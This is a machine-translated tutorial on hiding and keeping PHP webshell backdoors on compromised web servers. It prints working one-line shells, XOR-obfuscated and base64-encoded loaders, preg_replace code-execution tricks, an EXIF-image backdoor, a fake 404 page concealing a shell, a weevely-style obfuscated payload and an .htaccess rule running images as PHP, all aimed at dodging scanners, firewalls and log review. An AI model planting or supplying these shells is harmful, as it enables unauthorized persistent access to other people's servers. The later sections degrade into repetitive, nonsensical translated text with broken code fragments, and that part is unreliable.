PHP backdoor hiding and maintenance skills, PHP backdoor skills_PHP tutorial

PHP backdoor hiding and maintenance skills, PHP backdoor skills

After a successful test, you usually want to keep the privileges longer. The work of leaving the backdoor is crucial. It is important to note that commonly deployed backdoors include but are not limited to database permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden in public backdoors.

AD:

0×00 Preface

After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is crucial. The backdoors usually deployed include but are not limited to database permissions, WEB permissions, system user permissions, etc. .This article will popularize some of the ideas hidden in Volkswagen’s backdoor.

eval($_POST['cmd']);?>

or this

1. $_POST['cmd']);?>

Of course, this is only different in the function called. For the functions disabled by PHP, please look for them in php.ini: disable_functions.

But there are many ways for operation and maintenance to intuitively find our shell, such as

◆Compare file backup and find abnormalities through file name/modification time/size

◆Discovered through WEBSHELL backdoor scanning scripts, such as Scanbackdoor.php/Pecker/shelldetect.php and various scanners, etc.

◆Discover the location of the backdoor through the Access.log access log

◆ Or, our test sentence will be blocked by WAF, and another warning log will be sent, etc.

For common detection methods, the following seven common methods are summarized to hide the shell

0×01 Evasion

Look at the various backdoor scanning codes and you will know that it is absolutely forbidden to leave a keyword that everyone knows and shouts in the shell

Common keywords such as:

◆System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆File includes: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, some friends cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it is difficult to escape the scanner now, but everything is changing and the construction methods are endless

Student tudouya gave [a construction technique](http://www.freebuf.com/articles/web/33824.html) on FREEBUF using

2. @$_ ; // $_ = 1
3. $__=("#"^"|"); // $__ = _
4. $__.=("."^"~"); // _P
5. $__.=("/"^"`"); // _PO
6. $__.=("|"^"/"); // _POS
7. $__.=("{"^"/"); // _POST
8. ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST [1]);
9. ?>

Construction generation, of course, if it is too intuitive, you can write it like this

1. $_ ;$__=("#"^"|").("."^"~" ).("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]);?>

Then fill in some ordinary code to disguise it, and a simple "anti-kill" shell sample appears

The execution is correct and ordinary scanners are bypassed. You can also rely on it to write a new temporary shell

0×02 Features

It is also an interesting way to execute commands with the help of grammatical features. Borrowing the grammatical features of PHP when processing variables, it will analyze whether the data in double quotes contains variables (and parse their values)

eg.:

1. ${@eval(phpinfo())}

{} can parse the variable content within double quotes, and @ will continue to execute after an error occurs

Then you can start to construct the hidden backdoor in a big way, but the structure here is to rely on the command execution caused by the function, yes, it is preg_replace

1. "//e",$_POST['cmd'],"");?>

This method has obviously been included in the scanner’s blacklist, please modify it simply

2. function funfunc($str){}
3. echo preg_replace("//ies", 'funfunc("1")', $_POST["cmd"]);
4. ?>

Executed and not found

The execution method is obvious. When {${phpinfo()}} after regular matching is passed into funfunc, it causes code execution

1. funfunc("{${phpinfo()}}")

Another method

1. "$arr="".$_GET['cmd']."";");?>

0×03 contains

File inclusion is a method that everyone has tried, but there are also tricks to inclusion

Ordinary file inclusion may just be an include that contains a certain txt or jpg, or even directly leave an include vulnerability, but it is easy to find it with a scanner, and extra include files are also easy to find

Watch this script

2. if(@isset($_GET[content]))
3. {
4.  $fp=fopen('README','w');
5. file_put_contents('README',"
6. @file_put_contents('README',$_GET[content],FILE_APPEND);
7. fclose($fp);
8. require 'README';}
9. ?>

This solves a bit of the problem. The required shell can be generated as needed and then included

Unfortunately, because functions such as file_put_contents are too sensitive, they are easily discovered by scanning

Create a shell through encoding generation, which is generated upon access.

1. fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCdd KTs/Pg==') );
2. ?>

It can evade some scanners, but this mode is also more eye-catching, and the new files generated must be simply hidden to avoid detection.

Of course, new concepts such as heuristics will not be considered

When this method cannot meet the demand, the clever attacker returns to the picture

1. $exif=exif_read_data('./lol.jpg');preg_replace($exif['Make'],$exif['Model'],'');?>

Reference: A backdoor hidden in EXIF ​​of JPG images

This time there is no need to simply copy /b to generate the image horse. It is also possible to borrow the specific flag of the preg_replace execution file

Here may prompt Call to undefined function exif_read_data()

Need to modify php.ini, extension=php_exif.dll

Change its loading order to after extension=php_mbstring.dll

It can be seen that this image backdoor relies on the preg_replace e parameter, relies on PHP's variable parsing and execution, and uses base64 encoding. Finally, it relies on file identification to put together a complete shell, which is a good idea for children who are new to hidden backdoors. Small reminder

Of course, as long as there is an include point, the form of the included file is diverse, even including error_log (although closure may be considered), only unexpected...

0×04 Hidden

In order to prevent visitors from discovering the existence of the backdoor, clever security researchers will also confuse the audience and create mystery

1. span class="string">"-//IETF//DTD HTML 2.0//EN">

6. Not Found

7. The requested URL was not found on this server.

11. @preg_replace("/[checksql]/e",$_POST['cmd'],"saft");
12. ?>

With the help of the above html rendering, the browsing page has begun to disguise 404 to confuse the audience

But you can’t hide from visitors and you can’t hide from log analysis. In order to better hide it in a large number of logs, the following script is constructed

2. header('HTTP/1.1 404');
3. ob_start();
4. @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs /Pg=='));
5. ob_end_clean();
6. ?>

The access is a real 404, yes, the same is true in the log

But at this moment the script we want to connect has been generated in the current directory

0×05 confusion

Those who have used the weevely tool should know that the anti-kill shell it generates looks like this

2.     $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";  
3.     $kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";  
4.     $ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");  
5.     $wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";  
6.     $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";  
7.     $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");  
8.     $jgfi = $ftdf("l","","lclrlelaltel_functlilon");  
9.     $rdwm = $jgfi('', $smgv($ftdf("gi", "", $ zrmt.$kthe.$wmmi.$penh))); $rdwm();  
10. ?> 

I'm sorry to say that I'm not sure what to do

Ps: I'm not sure what to do: (

Specifying errors, replacing the base64_decode, replacing str_replace, base64_decode, >

I'm sorry, I'm not sure if I'm going to be able to do anything

If you are a member of the community:

◆I'm not sure what to do

◆If you want to be a friend, you can be a friend of yours

◆It's a good idea to have a personal account (I'm not sure what to do)

◆Cause Recording Conditions

◆畸形目录

If you don't have a friend, you can have a friend

0×06解析

Visit 用.htaccess, log in to your account

如:

AddType   application/x-httpd-php     .jpg 

以上以weeverly为例

0×07杂糅

I have a friend, a friend, a friend, a friend, a friend, a friend, a friend. I want to know. I want to be able to do that, I want to be able to do that, I want to be able to do that. I want to use the shell, I want to use the shell, I want to use the shell. I'm not sure what to do.

http://www.bkjia.com/PHPjc/1029359.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/1029359.htmlTechArticlePHP Technical Techniques I'm sorry, I'm sorry, I'm sorry. I'm not sure if I'm going to be able to do anything, I'm going to be able to do that...